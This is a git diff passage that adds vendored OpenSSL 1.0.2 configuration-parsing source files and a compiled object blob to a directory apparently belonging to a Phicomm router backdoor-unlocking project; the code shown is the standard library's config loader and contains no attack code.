+    STACK_OF(CONF_VALUE) *ts;
+
+    ts = (STACK_OF(CONF_VALUE) *)section->value;
+
+    value->section = section->section;
+    if (!sk_CONF_VALUE_push(ts, value)) {
+        return 0;
+    }
+
+    v = lh_CONF_VALUE_insert(conf->data, value);
+    if (v != NULL) {
+        (void)sk_CONF_VALUE_delete_ptr(ts, v);
+        OPENSSL_free(v->name);
+        OPENSSL_free(v->value);
+        OPENSSL_free(v);
+    }
+    return 1;
+}
+
+char *_CONF_get_string(const CONF *conf, const char *section,
+                       const char *name)
+{
+    CONF_VALUE *v, vv;
+    char *p;
+
+    if (name == NULL)
+        return (NULL);
+    if (conf != NULL) {
+        if (section != NULL) {
+            vv.name = (char *)name;
+            vv.section = (char *)section;
+            v = lh_CONF_VALUE_retrieve(conf->data, &vv);
+            if (v != NULL)
+                return (v->value);
+            if (strcmp(section, "ENV") == 0) {
+                p = getenv(name);
+                if (p != NULL)
+                    return (p);
+            }
+        }
+        vv.section = "default";
+        vv.name = (char *)name;
+        v = lh_CONF_VALUE_retrieve(conf->data, &vv);
+        if (v != NULL)
+            return (v->value);
+        else
+            return (NULL);
+    } else
+        return (getenv(name));
+}
+
+#if 0                           /* There's no way to provide error checking
+                                 * with this function, so force implementors
+                                 * of the higher levels to get a string and
+                                 * read the number themselves. */
+long _CONF_get_number(CONF *conf, char *section, char *name)
+{
+    char *str;
+    long ret = 0;
+
+    str = _CONF_get_string(conf, section, name);
+    if (str == NULL)
+        return (0);
+    for (;;) {
+        if (conf->meth->is_number(conf, *str))
+            ret = ret * 10 + conf->meth->to_int(conf, *str);
+        else
+            return (ret);
+        str++;
+    }
+}
+#endif
+
+static unsigned long conf_value_hash(const CONF_VALUE *v)
+{
+    return (lh_strhash(v->section) << 2) ^ lh_strhash(v->name);
+}
+
+static IMPLEMENT_LHASH_HASH_FN(conf_value, CONF_VALUE)
+
+static int conf_value_cmp(const CONF_VALUE *a, const CONF_VALUE *b)
+{
+    int i;
+
+    if (a->section != b->section) {
+        i = strcmp(a->section, b->section);
+        if (i)
+            return (i);
+    }
+
+    if ((a->name != NULL) && (b->name != NULL)) {
+        i = strcmp(a->name, b->name);
+        return (i);
+    } else if (a->name == b->name)
+        return (0);
+    else
+        return ((a->name == NULL) ? -1 : 1);
+}
+
+static IMPLEMENT_LHASH_COMP_FN(conf_value, CONF_VALUE)
+
+int _CONF_new_data(CONF *conf)
+{
+    if (conf == NULL) {
+        return 0;
+    }
+    if (conf->data == NULL)
+        if ((conf->data = lh_CONF_VALUE_new()) == NULL) {
+            return 0;
+        }
+    return 1;
+}
+
+void _CONF_free_data(CONF *conf)
+{
+    if (conf == NULL || conf->data == NULL)
+        return;
+
+    lh_CONF_VALUE_down_load(conf->data) = 0; /* evil thing to make * sure the
+                                              * 'OPENSSL_free()' works as *
+                                              * expected */
+    lh_CONF_VALUE_doall_arg(conf->data,
+                            LHASH_DOALL_ARG_FN(value_free_hash),
+                            LHASH_OF(CONF_VALUE), conf->data);
+
+    /*
+     * We now have only 'section' entries in the hash table. Due to problems
+     * with
+     */
+
+    lh_CONF_VALUE_doall(conf->data, LHASH_DOALL_FN(value_free_stack));
+    lh_CONF_VALUE_free(conf->data);
+}
+
+static void value_free_hash_doall_arg(CONF_VALUE *a,
+                                      LHASH_OF(CONF_VALUE) *conf)
+{
+    if (a->name != NULL)
+        (void)lh_CONF_VALUE_delete(conf, a);
+}
+
+static void value_free_stack_doall(CONF_VALUE *a)
+{
+    CONF_VALUE *vv;
+    STACK_OF(CONF_VALUE) *sk;
+    int i;
+
+    if (a->name != NULL)
+        return;
+
+    sk = (STACK_OF(CONF_VALUE) *)a->value;
+    for (i = sk_CONF_VALUE_num(sk) - 1; i >= 0; i--) {
+        vv = sk_CONF_VALUE_value(sk, i);
+        OPENSSL_free(vv->value);
+        OPENSSL_free(vv->name);
+        OPENSSL_free(vv);
+    }
+    if (sk != NULL)
+        sk_CONF_VALUE_free(sk);
+    OPENSSL_free(a->section);
+    OPENSSL_free(a);
+}
+
+/* Up until OpenSSL 0.9.5a, this was new_section */
+CONF_VALUE *_CONF_new_section(CONF *conf, const char *section)
+{
+    STACK_OF(CONF_VALUE) *sk = NULL;
+    int ok = 0, i;
+    CONF_VALUE *v = NULL, *vv;
+
+    if ((sk = sk_CONF_VALUE_new_null()) == NULL)
+        goto err;
+    if ((v = OPENSSL_malloc(sizeof(CONF_VALUE))) == NULL)
+        goto err;
+    i = strlen(section) + 1;
+    if ((v->section = OPENSSL_malloc(i)) == NULL)
+        goto err;
+
+    memcpy(v->section, section, i);
+    v->name = NULL;
+    v->value = (char *)sk;
+
+    vv = lh_CONF_VALUE_insert(conf->data, v);
+    OPENSSL_assert(vv == NULL);
+    ok = 1;
+ err:
+    if (!ok) {
+        if (sk != NULL)
+            sk_CONF_VALUE_free(sk);
+        if (v != NULL)
+            OPENSSL_free(v);
+        v = NULL;
+    }
+    return (v);
+}
+
+IMPLEMENT_STACK_OF(CONF_VALUE)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.h
new file mode 100644
index 0000000..e478f7d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.h
@@ -0,0 +1,89 @@
+/* conf_api.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef  HEADER_CONF_API_H
+# define HEADER_CONF_API_H
+
+# include <openssl/lhash.h>
+# include <openssl/conf.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Up until OpenSSL 0.9.5a, this was new_section */
+CONF_VALUE *_CONF_new_section(CONF *conf, const char *section);
+/* Up until OpenSSL 0.9.5a, this was get_section */
+CONF_VALUE *_CONF_get_section(const CONF *conf, const char *section);
+/* Up until OpenSSL 0.9.5a, this was CONF_get_section */
+STACK_OF(CONF_VALUE) *_CONF_get_section_values(const CONF *conf,
+                                               const char *section);
+
+int _CONF_add_string(CONF *conf, CONF_VALUE *section, CONF_VALUE *value);
+char *_CONF_get_string(const CONF *conf, const char *section,
+                       const char *name);
+long _CONF_get_number(const CONF *conf, const char *section,
+                      const char *name);
+
+int _CONF_new_data(CONF *conf);
+void _CONF_free_data(CONF *conf);
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_api.o
new file mode 100644
index 0000000000000000000000000000000000000000..81becb30f7934180ed7b60989071c2b1ddf645bc
GIT binary patch
literal 5680
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.c
new file mode 100644
index 0000000..e3ffeb2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_def.c
@@ -0,0 +1,703 @@
+/* crypto/conf/conf.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* Part of the code in here was originally in conf.c, which is now removed */
+
+#include <stdio.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/stack.h>
+#include <openssl/lhash.h>
+#include <openssl/conf.h>
+#include <openssl/conf_api.h>
+#include "conf_def.h"
+#include <openssl/buffer.h>
+#include <openssl/err.h>
+
+static char *eat_ws(CONF *conf, char *p);
+static char *eat_alpha_numeric(CONF *conf, char *p);
+static void clear_comments(CONF *conf, char *p);
+static int str_copy(CONF *conf, char *section, char **to, char *from);
+static char *scan_quote(CONF *conf, char *p);
+static char *scan_dquote(CONF *conf, char *p);
+#define scan_esc(conf,p)        (((IS_EOF((conf),(p)[1]))?((p)+1):((p)+2)))
+
+static CONF *def_create(CONF_METHOD *meth);
+static int def_init_default(CONF *conf);
+static int def_init_WIN32(CONF *conf);
+static int def_destroy(CONF *conf);
+static int def_destroy_data(CONF *conf);
+static int def_load(CONF *conf, const char *name, long *eline);
+static int def_load_bio(CONF *conf, BIO *bp, long *eline);
+static int def_dump(const CONF *conf, BIO *bp);
+static int def_is_number(const CONF *conf, char c);
+static int def_to_int(const CONF *conf, char c);
+
+const char CONF_def_version[] = "CONF_def" OPENSSL_VERSION_PTEXT;
+
+static CONF_METHOD default_method = {
+    "OpenSSL default",
+    def_create,
+    def_init_default,
+    def_destroy,
+    def_destroy_data,
+    def_load_bio,
+    def_dump,
+    def_is_number,
+    def_to_int,
+    def_load
+};
+
+static CONF_METHOD WIN32_method = {
+    "WIN32",
+    def_create,
+    def_init_WIN32,
+    def_destroy,
+    def_destroy_data,
+    def_load_bio,
+    def_dump,
+    def_is_number,
+    def_to_int,
+    def_load
+};
+
+CONF_METHOD *NCONF_default()
+{
+    return &default_method;
+}
+
+CONF_METHOD *NCONF_WIN32()
+{
+    return &WIN32_method;
+}
+
+static CONF *def_create(CONF_METHOD *meth)
+{
+    CONF *ret;
+
+    ret = OPENSSL_malloc(sizeof(CONF) + sizeof(unsigned short *));
+    if (ret)
+        if (meth->init(ret) == 0) {
+            OPENSSL_free(ret);
+            ret = NULL;
+        }
+    return ret;
+}
+
+static int def_init_default(CONF *conf)
+{
+    if (conf == NULL)
+        return 0;
+
+    conf->meth = &default_method;
+    conf->meth_data = CONF_type_default;
+    conf->data = NULL;
+
+    return 1;
+}
+
+static int def_init_WIN32(CONF *conf)
+{
+    if (conf == NULL)
+        return 0;
+
+    conf->meth = &WIN32_method;
+    conf->meth_data = (void *)CONF_type_win32;
+    conf->data = NULL;
+
+    return 1;
+}
+
+static int def_destroy(CONF *conf)
+{
+    if (def_destroy_data(conf)) {
+        OPENSSL_free(conf);
+        return 1;
+    }
+    return 0;
+}
+
+static int def_destroy_data(CONF *conf)
+{
+    if (conf == NULL)
+        return 0;
+    _CONF_free_data(conf);
+    return 1;
+}
+
+static int def_load(CONF *conf, const char *name, long *line)
+{
+    int ret;
+    BIO *in = NULL;
+
+#ifdef OPENSSL_SYS_VMS
+    in = BIO_new_file(name, "r");
+#else
+    in = BIO_new_file(name, "rb");
+#endif
+    if (in == NULL) {
+        if (ERR_GET_REASON(ERR_peek_last_error()) == BIO_R_NO_SUCH_FILE)
+            CONFerr(CONF_F_DEF_LOAD, CONF_R_NO_SUCH_FILE);
+        else
+            CONFerr(CONF_F_DEF_LOAD, ERR_R_SYS_LIB);
+        return 0;
+    }
+
+    ret = def_load_bio(conf, in, line);
+    BIO_free(in);
+
+    return ret;
+}
+
+static int def_load_bio(CONF *conf, BIO *in, long *line)
+{
+/* The macro BUFSIZE conflicts with a system macro in VxWorks */
+#define CONFBUFSIZE     512
+    int bufnum = 0, i, ii;
+    BUF_MEM *buff = NULL;
+    char *s, *p, *end;
+    int again;
+    long eline = 0;
+    char btmp[DECIMAL_SIZE(eline) + 1];
+    CONF_VALUE *v = NULL, *tv;
+    CONF_VALUE *sv = NULL;
+    char *section = NULL, *buf;
+    char *start, *psection, *pname;
+    void *h = (void *)(conf->data);
+
+    if ((buff = BUF_MEM_new()) == NULL) {
+        CONFerr(CONF_F_DEF_LOAD_BIO, ERR_R_BUF_LIB);
+        goto err;
+    }
+
+    section = (char *)OPENSSL_malloc(10);
+    if (section == NULL) {
+        CONFerr(CONF_F_DEF_LOAD_BIO, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    BUF_strlcpy(section, "default", 10);
+
+    if (_CONF_new_data(conf) == 0) {
+        CONFerr(CONF_F_DEF_LOAD_BIO, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    sv = _CONF_new_section(conf, section);
+    if (sv == NULL) {
+        CONFerr(CONF_F_DEF_LOAD_BIO, CONF_R_UNABLE_TO_CREATE_NEW_SECTION);
+        goto err;
+    }
+
+    bufnum = 0;
+    again = 0;
+    for (;;) {
+        if (!BUF_MEM_grow(buff, bufnum + CONFBUFSIZE)) {
+            CONFerr(CONF_F_DEF_LOAD_BIO, ERR_R_BUF_LIB);
+            goto err;
+        }
+        p = &(buff->data[bufnum]);
+        *p = '\0';
+        BIO_gets(in, p, CONFBUFSIZE - 1);
+        p[CONFBUFSIZE - 1] = '\0';
+        ii = i = strlen(p);
+        if (i == 0 && !again)
+            break;
+        again = 0;
+        while (i > 0) {
+            if ((p[i - 1] != '\r') && (p[i - 1] != '\n'))
+                break;
+            else
+                i--;
+        }
+        /*
+         * we removed some trailing stuff so there is a new line on the end.
+         */
+        if (ii && i == ii)
+            again = 1;          /* long line */
+        else {
+            p[i] = '\0';
+            eline++;            /* another input line */
+        }
+
+        /* we now have a line with trailing \r\n removed */
+
+        /* i is the number of bytes */
+        bufnum += i;
+
+        v = NULL;
+        /* check for line continuation */
+        if (bufnum >= 1) {
+            /*
+             * If we have bytes and the last char '\\' and second last char
+             * is not '\\'
+             */
+            p = &(buff->data[bufnum - 1]);
+            if (IS_ESC(conf, p[0]) && ((bufnum <= 1) || !IS_ESC(conf, p[-1]))) {
+                bufnum--;
+                again = 1;
+            }
+        }
+        if (again)
+            continue;
+        bufnum = 0;
+        buf = buff->data;
+
+        clear_comments(conf, buf);
+        s = eat_ws(conf, buf);
+        if (IS_EOF(conf, *s))
+            continue;           /* blank line */
+        if (*s == '[') {
+            char *ss;
+
+            s++;
+            start = eat_ws(conf, s);
+            ss = start;
+ again:
+            end = eat_alpha_numeric(conf, ss);
+            p = eat_ws(conf, end);
+            if (*p != ']') {
+                if (*p != '\0' && ss != p) {
+                    ss = p;
+                    goto again;
+                }
+                CONFerr(CONF_F_DEF_LOAD_BIO,
+                        CONF_R_MISSING_CLOSE_SQUARE_BRACKET);
+                goto err;
+            }
+            *end = '\0';
+            if (!str_copy(conf, NULL, &section, start))
+                goto err;
+            if ((sv = _CONF_get_section(conf, section)) == NULL)
+                sv = _CONF_new_section(conf, section);
+            if (sv == NULL) {
+                CONFerr(CONF_F_DEF_LOAD_BIO,
+                        CONF_R_UNABLE_TO_CREATE_NEW_SECTION);
+                goto err;
+            }
+            continue;
+        } else {
+            pname = s;
+            psection = NULL;
+            end = eat_alpha_numeric(conf, s);
+            if ((end[0] == ':') && (end[1] == ':')) {
+                *end = '\0';
+                end += 2;
+                psection = pname;
+                pname = end;
+                end = eat_alpha_numeric(conf, end);
+            }
+            p = eat_ws(conf, end);
+            if (*p != '=') {
+                CONFerr(CONF_F_DEF_LOAD_BIO, CONF_R_MISSING_EQUAL_SIGN);
+                goto err;
+            }
+            *end = '\0';
+            p++;
+            start = eat_ws(conf, p);
+            while (!IS_EOF(conf, *p))
+                p++;
+            p--;
+            while ((p != start) && (IS_WS(conf, *p)))
+                p--;
+            p++;
+            *p = '\0';
+
+            if (!(v = (CONF_VALUE *)OPENSSL_malloc(sizeof(CONF_VALUE)))) {
+                CONFerr(CONF_F_DEF_LOAD_BIO, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            if (psection == NULL)
+                psection = section;
+            v->name = (char *)OPENSSL_malloc(strlen(pname) + 1);
+            v->value = NULL;
+            if (v->name == NULL) {
+                CONFerr(CONF_F_DEF_LOAD_BIO, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            BUF_strlcpy(v->name, pname, strlen(pname) + 1);
+            if (!str_copy(conf, psection, &(v->value), start))
+                goto err;
+
+            if (strcmp(psection, section) != 0) {
+                if ((tv = _CONF_get_section(conf, psection))
+                    == NULL)
+                    tv = _CONF_new_section(conf, psection);
+                if (tv == NULL) {
+                    CONFerr(CONF_F_DEF_LOAD_BIO,
+                            CONF_R_UNABLE_TO_CREATE_NEW_SECTION);
+                    goto err;
+                }
+            } else
+                tv = sv;
+#if 1
+            if (_CONF_add_string(conf, tv, v) == 0) {
+                CONFerr(CONF_F_DEF_LOAD_BIO, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+#else
+            v->section = tv->section;
+            if (!sk_CONF_VALUE_push(ts, v)) {
+                CONFerr(CONF_F_DEF_LOAD_BIO, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            vv = (CONF_VALUE *)lh_insert(conf->data, v);
+            if (vv != NULL) {
+                sk_CONF_VALUE_delete_ptr(ts, vv);
+                OPENSSL_free(vv->name);
+                OPENSSL_free(vv->value);
+                OPENSSL_free(vv);
+            }
+#endif
+            v = NULL;
+        }
+    }
+    if (buff != NULL)
+        BUF_MEM_free(buff);
+    if (section != NULL)
+        OPENSSL_free(section);
+    return (1);
+ err:
+    if (buff != NULL)
+        BUF_MEM_free(buff);
+    if (section != NULL)
+        OPENSSL_free(section);
+    if (line != NULL)
+        *line = eline;
+    BIO_snprintf(btmp, sizeof btmp, "%ld", eline);
+    ERR_add_error_data(2, "line ", btmp);
+    if ((h != conf->data) && (conf->data != NULL)) {
+        CONF_free(conf->data);
+        conf->data = NULL;
+    }
+    if (v != NULL) {
+        if (v->name != NULL)
+            OPENSSL_free(v->name);
+        if (v->value != NULL)
+            OPENSSL_free(v->value);
+        if (v != NULL)
+            OPENSSL_free(v);
+    }
+    return (0);
+}
+
+static void clear_comments(CONF *conf, char *p)
+{
+    for (;;) {
+        if (IS_FCOMMENT(conf, *p)) {
+            *p = '\0';
+            return;
+        }
+        if (!IS_WS(conf, *p)) {
+            break;
+        }
+        p++;
+    }
+
+    for (;;) {
+        if (IS_COMMENT(conf, *p)) {
+            *p = '\0';
+            return;
+        }
+        if (IS_DQUOTE(conf, *p)) {
+            p = scan_dquote(conf, p);
+            continue;
+        }
+        if (IS_QUOTE(conf, *p)) {
+            p = scan_quote(conf, p);
+            continue;
+        }
+        if (IS_ESC(conf, *p)) {
+            p = scan_esc(conf, p);
+            continue;
+        }
+        if (IS_EOF(conf, *p))
+            return;
+        else
+            p++;
+    }
+}
+
+static int str_copy(CONF *conf, char *section, char **pto, char *from)
+{
+    int q, r, rr = 0, to = 0, len = 0;
+    char *s, *e, *rp, *p, *rrp, *np, *cp, v;
+    BUF_MEM *buf;
+
+    if ((buf = BUF_MEM_new()) == NULL)
+        return (0);
+
+    len = strlen(from) + 1;
+    if (!BUF_MEM_grow(buf, len))
+        goto err;
+
+    for (;;) {
+        if (IS_QUOTE(conf, *from)) {
+            q = *from;
+            from++;
+            while (!IS_EOF(conf, *from) && (*from != q)) {
+                if (IS_ESC(conf, *from)) {
+                    from++;
+                    if (IS_EOF(conf, *from))
+                        break;
+                }
+                buf->data[to++] = *(from++);
+            }
